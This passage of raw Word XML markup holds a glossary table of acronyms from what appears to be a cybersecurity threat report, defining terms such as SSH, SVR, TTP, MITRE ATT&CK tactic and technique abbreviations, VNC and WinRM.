              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Structured Query Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="7AA96715" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="57166C32" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1241A025" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SHell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="34D5B42A" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4FE480F2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0C33A88C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Secure Socket Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4609E566" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="056D76AB" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SVR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="536E3591" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Russia's Foreign Intelligence Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4A2BF22A" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="04B25F36" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Symphony</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="49FB5656" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Symfony is a free and open-source PHP web application framework and a set of reusable PHP component libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="0B0742E2" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="12F615B2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05AAF861" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technique, abbreviation used in the MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1D634AEB" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="309DA0EF" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2A33B995" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tactic, abbreviation used in the MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1E27595C" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="053DDF48" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="31AB92B1" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Transport Control Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="00C440E3" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="669BD5B8" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0362CFA3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Transport Layer Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="46758EA9" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03F9FF70" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>TTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="28C91D4B" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tools, Techniques and Procedures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="59FA4C15" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="26EEBDBA" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FF15FF0" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>User Datagram Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="61E22251" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7245AFEC" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="767AD8F5" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Uniform Resource Locator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="102916A7" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3B4B6C3F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>US</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5784792A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="5A42DCC3" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1356C8B5" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>USB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="035E7889" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Universal Serial Bus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="024D5D96" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="521BF922" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>VME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="16317475" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">virtual machine environment </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4B034404" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D0BF5FE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7EE8FB72" w14:textId="55C6C58A" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Virtual Network Connector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="24F6EAF5" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5755342E" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7ABFA3AC" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Virtual Private Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1301C73D" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FA07B04" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WHO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3A9C2344" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>World Health Organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="18A36ABA" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="46453957" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WiFi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="68B591B3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Wireless Fidelity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4F9FEA8F" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="50422E39" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="15F41395" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
